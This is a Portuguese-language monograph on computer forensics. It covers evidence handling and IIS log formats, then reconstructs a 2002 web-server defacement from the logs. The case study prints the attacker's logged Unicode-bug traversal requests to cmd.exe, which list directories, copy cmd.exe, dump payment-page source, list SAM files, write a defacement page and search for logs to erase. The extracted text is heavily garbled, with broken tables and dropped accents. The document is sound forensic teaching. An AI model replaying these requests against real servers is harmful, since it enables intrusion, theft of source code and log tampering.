Professional Documents
Culture Documents
Resumo
O assunto tratado neste trabalho possibilita um vasto campo para estudo e
pesquisas, desta forma com sua modesta abrangncia, este trabalho pretende servir
como motivao ao leitor para busca de novos conhecimentos no campo da percia
forense aplicada informtica. No houve aqui a pretenso de esgotar o assunto,
mas sim fornecer ao leitor um texto condensado reunindo conceitos fundamentais
ao entendimento dos termos relacionados.
Constar detalhes sobre o processo de percia forense aplicada informtica e a
importncia de seguir procedimentos especficos imediatamente depois de um
crime por computador.
ndice Sumrio
Introduo .................................................................................................... 1
Captulo 1 - Percia Forense.......................................................................... 2
Percia Forense Aplicada a Redes....................................................... 2
Anlise Pericial ................................................................................... 3
Anlise Fsica...................................................................................... 3
Fazendo a Pesquisa de Seqncia............................................. 4
O Processo de Busca e Extrao .............................................. 4
Extraindo Espao Subaproveitado e Livre de Arquivos .......... 5
Anlise Lgica .............................................................................................. 6
Entendendo Onde Ficam as Provas .............................................................. 7
Captulo 2 - Percia Forense para Obteno de Evidncias.......................... 9
Identificao........................................................................................ 9
Preservao ......................................................................................... 9
Anlise .............................................................................................. 10
Apresentao..................................................................................... 10
Captulo 3 - Investigando Servidores Web ................................................. 12
Microsoft IIS (Internet Information Server)..................................... 13
W3C Extended Log File Format....................................................... 14
Introduo
A Tecnologia da Informao avanou rapidamente em pouco tempo. As
instituies esto utilizando estes avanos tecnolgicos para melhorar as operaes
empresariais e o potencial de mercado. Pode-se pagar contas on-line; ou comprar
qualquer coisa desde livros a mantimentos. Uma vasta quantia de importantes e
sensveis dados fluem ao redor do Cyber Espao e a qualquer momento poder cair
em mos maliciosas. Infelizmente, isto acontece diariamente. Quando algum
"rouba" dados do Cyber Espao, chamado de Cyber Crime.
Antigamente a chave para resolver crimes eram obtidas atravs de impresses
digitais, relatrios de toxicologia, anlise de rastro, documentos em papel e outros
meios tradicionais.
Enquanto estes ainda provem pedaos muito importantes do quebra-cabea em
muitos crimes cometidos hoje, a tecnologia adicionou uma outra dimenso com a
evidncia digital.
Freqentemente mais informaes podem ser ganhas da anlise de um computador
que o de uma impresso digital. A histria inteira de um crime pode ser contada
com a recuperao de um arquivo que pensaram ter sido apagado.
Anlise Pericial
A anlise pericial o processo usado pelo investigador para descobrir informaes
valiosas, a busca e extrao de dados relevantes para uma investigao. O processo
de anlise pericial pode ser dividido em duas camadas : anlise fsica e anlise
lgica.
A anlise fsica a pesquisa de seqncias e a extrao de dados de toda a imagem
pericial, dos arquivos normais s partes inacessveis da mdia. A anlise lgica
consiste em analisar os arquivos das parties. O sistema de arquivos investigado
no formato nativo, percorrendo-se a rvore de diretrios do mesmo modo que se
faz em um computador comum.
Anlise Fsica
Durante a anlise fsica so investigados os dados brutos da mdia de
armazenamento. Ocasionalmente, pode-se comear a investigao por essa etapa,
por exemplo quando se est investigando o contedo de um disco rgido
desconhecido ou danificado. Depois que o software de criao de imagens tiver
fixado as provas do sistema, os dados podem ser analisados por trs processos
principais : uma pesquisa de seqncia, um processo de busca e extrao e uma
extrao de espao subaproveitado e livre de arquivos. Todas as operaes so
realizadas na imagem pericial ou na copia restaurada das provas. Com freqncia ,
se faz pesquisas de seqncias para produzir listas de dados . essas listas so teis
nas fases posteriores da investigao. Entre as listas geradas esto as seguintes :
Anlise Lgica
Durante um exame de arquivos lgicos, o contedo de cada partio pesquisada
com um sistema operacional que entenda o sistema de arquivos. neste estgio
que cometida a maioria dos erros de manipulao das provas. O investigador
precisa estar ciente de todas as medidas tomadas na imagem restaurada. por isto
que quase nunca se usa diretamente sistemas operacionais mais convenientes,
como o Windows 95/98/NT/2000/XP. Mais uma vez, o objetivo bsico proteger
as provas contra alteraes.
Montar ou acessar a imagem restaurada a partir de um sistema operacional que
entenda nativamente o formato do sistema de arquivos muito arriscado, pois
normalmente o processo de montagem no documentado, no est disposio
do publico e no pode ser verificado. A imagem restaurada precisa ser protegida e
por isso que se monta cada partio em Linux, em modo somente leitura. O
sistema de arquivos montado ento exportado, via Samba, para a rede segura do
Camada do sistema de
Localizao de provas em
Localizao de provas em
arquivos
DOS ou Windows
Linux
Armazenamento de aplicativos Arquivos
Arquivos
Classificao de informaes Diretrios e pastas
Diretrios
Alocao de espao de
FAT
Inode e bitmaps de dados
armazenamento
Formato de blocos
Clusters
Blocos
Classificao de dados
Parties
Parties
Fsica
Setores absolutos ou C/H/S
Setores absolutos
Tabela 1: Camadas de armazenamento do sistema de arquivos
Identificao
Dentre os vrios fatores envolvidos no caso, necessrio estabelecer com clareza
quais so as conexes relevantes como datas, nomes de pessoas, empresas, rgos
pblicos, autarquias, instituies etc., dentre as quais foi estabelecida a
comunicao eletrnica. Discos rgidos em computadores podem trazer a sua
origem (imensas quantidades de informaes) aps os processos de recuperao de
dados.
Preservao
Todas as evidncias encontradas precisam obrigatoriamente ser legtimas, para
terem sua posterior validade jurdica. Sendo assim, todo o processo relativo
obteno e coleta das mesmas, seja no elemento fsico (computadores) ou lgico
(mapas de armazenamento de memria de dados) deve seguir normas
internacionais. Parte-se sempre do princpio de que a outra parte envolvida no caso
poder e dever pedir a contra-prova, sobre os mesmos elementos fsicos, ento o
profissionalismo destas tarefas ser critico na seqncia do processo, lembrando
sempre que, caso o juiz no valide a evidncia, ela no poder ser re-apresentada.
Anlise
Ser a pesquisa propriamente dita, onde todos os filtros de camadas de informao
j foram transpostos e pode-se deter especificamente nos elementos relevantes ao
caso em questo. Novamente, deve-se sempre ser muito profissional em termos da
obteno da chamada prova legtima, a qual consiste numa demonstrao efetiva
e inquestionvel dos rastros e elementos da comunicao entre as partes envolvidas
e seu teor, alm das datas, trilhas, e histrico dos segmentos de disco utilizados.
Apresentao
Tecnicamente chamada de substanciao da evidncia, ela consiste no
enquadramento das evidncias dentro do formato jurdico como o caso ser ou
poder ser tratado. Os advogados de cada uma das partes ou mesmo o juiz do caso
podero enquadr-lo na esfera civil ou criminal ou mesmo em ambas. Desta forma,
quando se tem a certeza material das evidncias, atua-se em conjunto com uma das
partes acima descritas para a apresentao das mesmas.
IIS,
arquivo
de
log
padro
est
localizado
no
diretrio
possvel selecionar qualquer um dos campos, mas alguns campos podem no ter
informaes disponveis para algumas solicitaes. Para os campos que forem
selecionados, mas para os quais no houver informaes, aparecer um travesso
() no campo como um espao reservado.
Campo
Data
Hora
Endereo IP
do cliente
Nome do
usurio
Nome do
servio e
nmero da
instncia
Nome do
servidor
IP do servidor
Mtodo
Tronco URI
Consulta URI
Status do Http
Status do
Significado
Aes do servidor
Aes do cliente
Aes de cliente para servidor
Aes de servidor para cliente
Aparece como
date
time
c-ip
Descrio
Data de ocorrncia da atividade.
Hora de ocorrncia da atividade.
Endereo IP do cliente que acessou o servidor.
cs-username
s-sitename
Win32
Bytes
enviados
Bytes
recebidos
Porta do
servidor
Tempo gasto
Verso do
protocolo
Agente do
usurio
Cookie
Referenciador
sc-bytes
cs-bytes
s-port
time-taken
cs-version
cs(user-agent)
cs(cookie)
cs(referer)
Tempo
total do
usurio
Tempo
total do
ncleo
Total de
falhas da
pgina
Total de
processos
Aparece
como
sprocesstype
s-event
c-usertime
Descrio
Tipo de processo disparado pelo evento, um aplicativo CGI ou fora de
processo. O tipo pode ser CGI, Aplicativo ou Todos.
O evento disparado: Site-Stop, Site-Start, Site-Pause, Periodic-Log,
Interval-Start, Interval-End, Interval-Change, Log-ChangeInt/Start/Stop, Eventlog-Limit, Priority-Limit, Process-Stop-Limit,
Site-Pause-Limit, Eventlog-Limit-Reset, Priority-Limit-Reset,
Process-Stop-Limit-Reset ou Site-Pause-Limit-Reset.
Tempo total acumulado do processador de modo do usurio, em
segundos, utilizado pelo site durante o intervalo atual.
s-kerneltime
s-pagefaults
s-totalprocs
Processos
ativos
Total de
processos
encerrados
Valor
Significado
Site-Stop
Site da Web parado por algum motivo.
Site-Start
Site da Web iniciado ou reiniciado.
Site-Pause
Pausa no site da Web.
Periodic-Log
Entrada de log definida regularmente, cujo intervalo foi
especificado pelo administrador.
Interval-Start
Intervalo de redefinio iniciado.
Interval-End
Intervalo de redefinio atingido e redefinido.
Interval-Change
O administrador do site da Web alterou o valor do Intervalo de
redefinio.
Log-Change-Int/Start/Stop Ocorreu um dos seguintes eventos: intervalo de log modificado;
evento de intervalo; ou site parado, iniciado ou interrompido.
Eventlog-Limit
Log de evento criado para o site da Web porque um aplicativo CGI
ou fora de processo atingiu o limite de log de evento definido pelo
administrador.
Priority-Limit
O site da Web teve um aplicativo CGI ou fora de processo definido
com baixa prioridade porque atingiu o limite de baixa prioridade
definido pelo administrador.
Process-Stop-Limit
O site da Web teve um aplicativo CGI ou fora de processo parado
porque atingiu o limite de paralisao de processos definido pelo
administrador.
Site-Pause-Limit
O site da Web foi interrompido porque um aplicativo CGI ou fora
de processo atingiu o limite de interrupo de sites definido pelo
administrador.
Eventlog-Limit-Reset
O Intervalo de redefinio foi alcanado ou o Eventlog-Limit foi
redefinido manualmente.
Priority-Limit-Reset
O Intervalo de redefinio foi alcanado ou o Priority-Limit foi
redefinido manualmente.
Process-Stop-Limit-Reset O Intervalo de redefinio foi alcanado ou o Process-Stop-Limit
foi redefinido manualmente.
Site-Pause-Limit-Reset
O Intervalo de redefinio foi alcanado ou o Site-Pause-Limit foi
redefinido manualmente.
De todos os campos que podem ser encontrados nos arquivos de logs, o HTTP
Status (sc-status) requer alguma explicao. Em geral, qualquer cdigo entre 200 e
299 indica sucesso, os cdigos entre 300 e 399 indicam aes que precisam ser
tomadas pelo cliente para cumprir um pedido. Cdigos entre 400 e 499 e entre 500
e 599 indicam erros do cliente e servidor, respectivamente.
Nome de
usurio
Data
Hora
Servio e
instncia
Nome do
computador
Endereo IP
do servidor
192.168.114.201
03/27/2002
7:55:20
W3SVC2
VENDAS1
172.21.13.45
Tempo
Bytes
Bytes
gasto recebidos enviados
4502
163
3223
Cdigo
de status
de servio
Cdigo de
status do
Windows 2000
Tipo de
solicitao
Destino da
operao
200
GET
DeptLogo.gif
Nome de usurio
Data
172.21.13.45
INFORMATICA\Andrey
08/Apr/2002
17:39:10 0800
Tipo de solicitao
Bytes enviados
200
3401
Log ODBC
Outra opo registrar solicitaes do site da Web em um banco de dados Open
Database Connectivity (ODBC). Para registrar em um banco de dados ODBC, ser
preciso configurar o Data Source Name (DSN, nome da fonte de dados), a tabela e
especificar o nome de usurio e a senha a serem usados durante o registro no banco
de dados.
Uma diferena importante entre o registro do ODBC e as outras opes que com
ele, uma nica transmisso cria vrios registros. Por causa desse grande nmero de
entradas, o registro do ODBC requer mais recursos de servidor que os outros
mtodos de registro, podendo afetar o desempenho do servidor Web, dependendo
do tipo de banco de dados, localizao e quantidade de entradas registradas.
A lista a seguir um exemplo dos campos que os registros do ODBC geram :
Clienthost
: Endereo IP do cliente;
Username
Logtime
Service
ServerIP
: Endereo IP do servidor;
BytesSent
ServiceStatus
Win32Status
Operation
: Comando do protocolo;
Target
: Destinatrio.
O Aviso
No dia 27 de maro de 2002, recebemos a informao de que um dos servidores
web havia sido atacado e que a pgina inicial do site da empresa teria sido alterada.
Os servidores web recebem inmeras sondagens, varreduras (scans) e consultas
diariamente. Entretanto, uma informao como esta informada pelo administrador
da rede merece uma ateno imediata, uma vez que os ataques via Web so do tipo
de ataque mais devastador em termos de percepo do pblico.
A Sondagem
Sabemos que a desfigurao aconteceu no dia 27/03/2002. Assim sendo,
comearemos procurando nos arquivos de logs do IIS por possveis sondagens de
informaes : o estgio de coleta de informaes.
Se o hacker tem por finalidade especfica atacar o site de uma empresa (para roubo
de informaes ou produto), normalmente se comea com a coleta de informaes.
Primeiro ir determinar quais as informaes sobre o software e funcionalidade do
servidor Web esto disponveis, podendo utilizar um site espelhado para estudo.
Embora no seja ilegal e no indique um ataque por si s, quando esse tipo de
coleta de informaes combinada com outras atividades, o investigador deve
desconfiar. Para examinar a total funcionalidade do site, o invasor espelha o site,
copiando cada pgina para examin-las em detalhes off-line. Para o IIS, essa
atividade deve aparecer como muitos pedidos do mesmo IP de origem durante um
curto perodo de tempo :
2002-03-25
2002-03-25
2002-03-25
2002-03-25
2002-03-25
2002-03-25
2002-03-25
2002-03-25
12:26:13
12:26:14
12:26:15
12:26:15
12:26:15
12:26:16
12:26:16
12:26:17
200.165.19.23
200.165.19.23
200.165.19.23
200.165.19.23
200.165.19.23
200.165.19.23
200.165.19.23
200.165.19.23
GET
GET
GET
GET
GET
GET
GET
GET
/ 401
/Default.asp 200
/principal.asp 200
/img/logo1.jpg 200
/img/pixel_branco.gif 401
/img/l_eazul.gif 200
/img/l_dazul.gif 200
/img/l_1eazul.gif 200
Encontrando a Vulnerabilidade
O primeiro indcio do ataque foi encontrado no dia anterior ao defacement (s
23:45:32) no arquivo ex020326.log, o dia em que o Hacker descobriu a
vulnerabilidade no servidor Web, vulnerabilidade esta denominada Unicode Bug.
Unicode Bug
O invasor explora uma vulnerabilidade no IIS advinda de uma falha de
programao, que permite atravs de uma linha de comando no browser ou
atravs de um exploit, visualizar e alterar o contedo de um servidor Windows
NT/2000.
Andrey Rodrigues de Freitas : andreyr@bol.com.br
O Ataque
Com a descoberta da vulnerabilidade no dia anterior, o Hacker comea a explorar o
servidor em busca de informaes, o primeiro registro encontrado no dia 27/03
uma listagem no diretrio c:\winnt\system32 s 03:23:51, o mesmo tipo de registro
encontrado anteriormente.
Registro da ocorrncia:
2002-03-27 03:23:51 200.165.19.23 GET
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir 200
Resposta obtida:
Pasta de c:\winnt\system32
14/01/2002 09:07
<DIR>
.
14/01/2002 09:07
<DIR>
..
15/02/2002 16:37
301 $winnt$.inf
23/01/2000 22:00
32.528 aaaamon.dll
23/01/2000 22:00
69.904 access.cpl
13/09/2001 17:00
71.168 acctres.dll
23/01/2000 22:00
154.896 accwiz.exe
23/01/2000 22:00
61.952 acelpdec.ax
15/12/2001 13:34
<DIR>
Config
...
1929 arquivo(s) 258.173.466 bytes
33 pasta(s) 1.784.097.664 bytes disponveis
Com o total acesso ao servidor, o invasor procura saber onde se hospeda o site da
empresa, listando a raiz do servidor.
Registro da ocorrncia:
2002-03-27 03:24:45 200.165.19.23 GET
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ 200
Resposta obtida:
Pasta de c:\
07/01/2002
06/01/2001
16/02/2002
20/03/2002
15/03/2001
07/06/2001
15/05/2001
20/06/2001
07/11/2001
07/11/2001
17:54
15:33
10:06
10:17
17:10
15:59
13:42
14:14
17:39
17:54
<DIR>
Arquivos de programas
69 DOCUMENT
<DIR>
Documents and Settings
<DIR>
DrWatson
<DIR>
Inetpub
<DIR>
mspclnt
<DIR>
Sites
<DIR>
temp
<DIR>
usr
<DIR>
WINNT
1 arquivo(s)
69 bytes
9 pasta(s) 1.785.602.048 bytes disponveis
Resposta obtida:
Pasta de c:\inetpub\wwwroot
15/03/2001
15/03/2001
17:10
<DIR>
.
17:10
<DIR>
..
0 arquivo(s)
0 bytes
2 pasta(s) 1.785.491.456 bytes disponveis
O Hacker lista mais alguns diretrios (usr, temp) a procura do Web Site ou de
informaes que sejam importantes...
Registros da ocorrncia:
2002-03-27 03:26:03 200.165.19.23 GET
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\usr 200
2002-03-27 03:27:33 200.165.19.23 GET
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\temp 200
Resposta obtida:
Pasta de C:\Sites
15/05/2001
15/05/2001
20/05/2001
24/05/2001
29/05/2001
12/11/2001
20/05/2001
12/08/2001
31/02/2002
26/03/2002
13:08
<DIR>
13:08
<DIR>
11:37
<DIR>
15:07
<DIR>
11:49
208
15:46
<DIR>
11:37
<DIR>
17:14
<DIR>
12:32
1.100
15:04
2.286
3 arquivo(s)
3.594
7 pasta(s)
1.785.126.912
.
..
Base
Imagens
default.asp
Pagamentos
Projetos
SiteSeguro
global.asa
principal.asp
bytes
bytes disponveis
Para facilitar seu trabalho de digitao das linhas de comando, o invasor copia o
programa cmd.exe do diretrio c:\winnt\system32 para dentro do diretrio do site,
c:\sites, (provavelmente ele usou algum exploit para encontrar a vulnerabilidade,
mas para poder continuar a explorar o servidor necessrio digitar manualmente os
comandos).
Cmd
Interpretador de comandos do Windows.
Registro da ocorrncia:
2002-03-27 03:30:22 200.165.19.23 GET
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c
:\sites\cmd.exe 200
O Web Site da empresa foi todo elaborado usando a tecnologia ASP (Active Server
Pages) da Microsoft, as pginas so processadas no servidor e enviadas aos
usurios no formato html, portanto um cliente (browser) no tem acesso ao cdigofonte da programao ASP.
Sabendo que no seria possvel visualizar o cdigo fonte das pginas em ASP, o
invasor copia as pginas renomeando-as para uma outra extenso e depois
visualiza seu contedo. A extenso escolhida pelo Hacker foi do tipo doc, que pode
ser visualizada em qualquer browser, porm, se tivesse escolhido um outro formato
como html ou txt nada apareceria em sua tela, mas no quer dizer que estaria
errado, somente seria mais trabalhoso para visualizar o contedo da pgina, pois
teria que no browser escolher a opo Exibir cdigo fonte.
O invasor cria um documento na raiz do site com o nome de pagamento.doc
contendo todo o contedo da pgina de programao pagamento.asp, este arquivo
contm todo o processo e inteligncia do sistema de pagamento on-line da empresa
(depsitos, boletos e cartes de crditos).
Registro da ocorrncia:
2002-03-27 03:34:01 200.165.19.23 GET
/cmd.exe?/c+type+c:\Sites\pagamento\pagamento.asp+>+pagamento.doc 200
2002-03-27 03:34:33 200.165.19.23 GET /pagamento.doc 200
Respostas obtida:
Pasta de C:\Sites\Base
14/06/2001
21/05/2001
15:12
13:07
2 arquivo(s)
61.440 Clientes.mdb
163.340 Financeiro.mdb
224.780 bytes
Pasta de C:\Sites\Base
14/06/2001
15:10
1 arquivo(s)
440 clientes.sql
440 bytes
03:38:03
03:38:45
03:39:01
03:40:09
03:40:55
03:40:09
03:41:36
03:41:55
03:42:26
O Hacker continua procurando por outros tipos de documentos (doc, pdf, xls, ppt).
Registros da ocorrncia:
2002-03-27 03:39:22 200.165.19.23 GET /sites/cmd1.exe /c+dir+/S+*.doc 200
Resposta obtida:
Pasta de c:\winnt\repair
15/05/2001
15/05/2001
23/01/2000
25/08/2001
15/05/2001
10/03/2002
15/05/2001
15/05/2001
15/05/2001
15/05/2001
15/05/2001
16:51
16:51
22:00
13:50
16:35
14:55
16:51
16:55
16:48
16:55
16:55
<DIR>
<DIR>
515
2.969
118.784
20.480
522.946
16.384
142.083
5.873.664
1.077.248
.
..
autoexec.nt
config.nt
default
sam
secsetup.inf
security
setup.log
software
system
9 arquivo(s)
7.775.073 bytes
2 pasta(s) 1.784.049.664 bytes disponveis
Cria outro arquivo texto contendo a listagem de toda a estrutura do servidor e seus
arquivos.
Registro da ocorrncia:
2002-03-27 04:03:39 200.165.19.23 GET /sites/cmd1.exe?/c+dir+>+teste.zen 502
(dir / S)
Registros da ocorrncia:
2002-03-27 04:07:07 200.165.19.23 GET
/cmd.exe?/c+echo+Pagina+hackeada+em+27/03/2002!!!+>+c:\sites\default.htm 200
2002-03-27 04:07:33 200.165.19.23 GET /sites/default.htm 200
Aps alterar a pgina principal do Web site, o Hacker procura pelos arquivos de
Log para poder exclu-los e apagar por definitivo seus rastros, felizmente os
arquivos no esto em seu diretrio padro c:\winnt\system32\LogFiles\W3SVC1
Registro da ocorrncia:
2002-03-27 04:09:13 200.165.19.23 GET /sites/cmd.exe?/c+dir+/S+c:\*W3SVC* 200
Resposta obtida:
Pasta de c:\WINNT\ServicePackFiles\i386
19/07/2001
05:34
1 arquivo(s)
348.944 w3svc.dll
348.944 bytes
Pasta de c:\WINNT\system32\inetsrv
15/03/2001
10:13
355.088 w3svc.dll
1 arquivo(s)
355.088 bytes
Pasta de c:\WINNT\system32\LogFiles
16/03/2001
18:46
<DIR>
0 arquivo(s)
W3SVC1
0 bytes
Registro da ocorrncia:
2002-03-27 04:09:33 200.165.19.23 GET
/cmd.exe?/c+dir+/S+c:\winnt\system32\logfiles\W3SVC1 200
Resposta obtida:
Pasta de c:\WINNT\system32\LogFiles\W3SVC1
16/03/2001
16/03/2001
20:39
<DIR>
.
20:39
<DIR>
..
0 arquivo(s)
0 bytes
2 pasta(s) 1.785.491.456 bytes disponveis
Descobrimos na anlise, um outro tipo de ataque que estava ocorrendo no Web Site
da empresa, um ataque de difcil percepo e ocasionada por erros de
desenvolvimento,
denominado
ataque
nvel
de
aplicativo.
Abaixo
20:33:57
20:34:04
20:34:21
20:34:24
20:35:27
20:37:22
192.168.1.243
192.168.1.243
192.168.1.243
192.168.1.243
192.168.1.243
192.168.1.243
12:22:45
12:22:56
12:23:11
12:23:16
12:23:22
12:24:12
12:24:22
12:25:28
12:25:32
12:25:37
12:25:48
12:25:59
12:26:17
12:26:29
200.165.19.23
200.165.19.23
200.165.19.23
200.165.19.23
200.165.19.23
200.165.19.23
200.165.19.23
200.165.19.23
200.165.19.23
200.165.19.23
200.165.19.23
200.165.19.23
200.165.19.23
200.165.19.23
200
200
200
200
200
200
200
200
200
Concluso
Com os avanos tecnolgicos nas comunicaes e a troca de informaes entre
empresas e corporaes, os crimes relacionados com informtica se espalharam. As
ofensas Hi-tech tais como os Hackers, vrus, fraudes eletrnicas na Internet e do
abuso do E-mail continuaro a aumentar nos prximos anos.
Muitas empresas oferecero treinamentos na aquisio, na examinao e na
utilizao apropriada da evidncia eletrnica. No poder usar a informao
coletada perante o juiz pior do que no ter uma prova.
O campo da Percia Forense aplicada em Sistemas Computacionais continuar a
crescer e comearemos a ver empresas com os detetives digitais treinados na
equipe de funcionrios, a combater no somente ameaas externas e internas mas
tambm a analisar e preparar procedimentos e aplicaes protetoras para a
empresa.
Bibliografia
Stephen Northcutt, Mark Cooper, Mat Fearnow, Karen Frederick : Intrusion
Signatures and Analysis, Editora Sans Giac, New Riders, 2001, Indianpolis,
Indiana, EUA.
Stephen Northcutt : Como detectar invaso em rede um guia para analistas,
Editora Cincia Moderna, 2000, Rio de Janeiro, RJ, Brasil.
Joel Scambray, Stuart McLure, George Kurtz: Hackers Expostos Segredos e
Solues para a Segurana de Redes, 2a Edio, Editora Makron Books, 2001,
So Paulo, SP, Brasil.
Kevin Mandia, Chris Prosise: Hackers resposta e contra-ataque Investigando
crimes por computador, Editora Campus, 2001, Rio de Janeiro, RJ, Brasil.
Kelli Adam: IIS 5 Administrao do Internet Information Services, Editora
Campus, 2000, Rio de Janeiro, RJ, Brasil.
Microsoft Press: Microsoft Windows NT Server 4.0 Resource Kit, Editora
Makron Books, 1998, So Paulo, SP, Brasil.
Sidney Galeote: Construindo Intranet com Windows NT 4.0 , Editora Erica,
1997, So Paulo, SP, Brasil.
Andrey Rodrigues de Freitas : andreyr@bol.com.br
Anexos
Anexo 1
Como Saber que Houve uma Invaso
Quanto mais sofisticado for o hacker, menos probabilidades ter de saber que uma
mquina est comprometida. hackers habilidosos encobriro bem suas trilhas,
tornando difcil perceber se executaram alguma alterao e podem ocultar o fato de
que esto na mquina mesmo quando se estiver examinando. Ocultando os
processos, conexes abertas, acesso a arquivos e o uso de recursos do sistema, os
Hackers podem tornar suas aes quase inteiramente invisveis.
H, portanto, vrias maneiras de detectar que uma invaso ocorreu.
Alterao de pginas Web : Uma diverso comum dos hackers iniciantes (ou
daqueles que querem realmente enviar uma mensagem) substituir o contedo do
Web Site para anunciar sua invaso bem-sucedida. Geralmente ocorre na prpria
pgina principal, onde ela a mais visvel. Se os invasores quiserem manter o
acesso, raramente anunciaro sua presena dessa ou de outras formas.
Warez diminuio dramtica do espao em disco : Os hackers usaro
freqentemente as mquinas para armazenar Warez (verses ilegais ou
hackeadas/craqueadas de software comercial), executando hacking em ferramentas,
pornografia e em outros arquivos que quiserem ter disponveis ou quiserem
compartilhar com outros. Esse espao livre em disco tende a ser consumido
rapidamente.
Alta utilizao da rede : Se a atividade na rede parecer alta, mesmo quando no
estiver fazendo algo, algum pode estar usando alguma mquina para
disponibilizar arquivos, ou, talvez, para invadir outra mquina via rede.
Contato proveniente de outros administradores : Se alguma mquina estiver
sendo usada para executar ataques a outras mquinas, os administradores que
estiverem sendo invadidos podem entrar em contato para informar este fato.
Interfaces de rede promscuas : Se os invasores quiserem farejar qualquer uma
das redes disponveis no computador, colocaro a interface no modo promscuo
(que captura todos os pacotes).
Arquivos de registro (log) excludos/truncados : Hackers experientes removero
as linhas individuais dos arquivos de registro que mostrem seu acesso indevido ao
sistema. Um hacker iniciante pode, em vez disso, simplesmente excluir
inteiramente os registros. Qualquer arquivo de registro que apresentar falta de
perodos de tempo ou for apagado de maneira suspeita pode ter sido adulterado.
Arquivos utmp/wtmp danificados (Linux) : Os hackers podem eliminar suas
entradas de login dos arquivos utmp e wtmp (programas como o zap, wipe e
vanish2 fazem isso rapidamente) ou apagar os prprios arquivos para ocultar o fato
de que se conectaram.
Anexo 2
Bem-sucedido (2xx)
Indica que a solicitao (request) obteve sucesso. Por exemplo, o cdigo
200 utilizado para indicar que a pgina solicitada foi obtida, entendida e
aceita com sucesso.
200 : OK
201 : Criado (Created)
202 : Aceito (Accepted)
203 : Informao no autorizada (Non-Authoritative Information)
204 : Nenhum contedo (No Content)
205 : Contedo redefinido (Reset Content)
206 : Contedo parcial (Partial Content)
Redirecionamento (3xx)
Indica que aes adicionais devem ser tomadas antes da solicitao
(request) ser satisfeita. Por exemplo, o cdigo 301 indica que a pgina foi
movida e o browser ser redirecionado para a nova pgina.
300 : Mltiplas opes (Multiple Choices)
301 : Transferido permanentemente (Moved Permanently)
302 : Transferido temporariamente (Moved Temporarily)
303 : Ver outro (See Other)
304 : No modificado (Not Modified)
305 : Usar proxy (Use Proxy)
307 : Redirecionamento temporrio (Temporary Redirect)
Anexo 3
Empresa
: Symantec
Site
: http://www.symantec.com
Software
: SafeBack 2.0
Empresa
Site
: http://www.forensics-intl.com
Software
Empresa
Site
: http://www.cdp.com
Software
: Byte Back
Empresa
Site
: http://www.toolsthatwork.com
Software
Empresa
: PowerQuest Corporation
Site
: http://www.powerquest.com
Andrey Rodrigues de Freitas : andreyr@bol.com.br
Software
: EnCase 2.08
Empresa
Site
: http://www.guidancesoftware.com
Software
Empresa
Site
: http://www.redhat.com
Software
: WinHex
Autor
: Stefan Fleschmann
Site
: http://www.winhex.com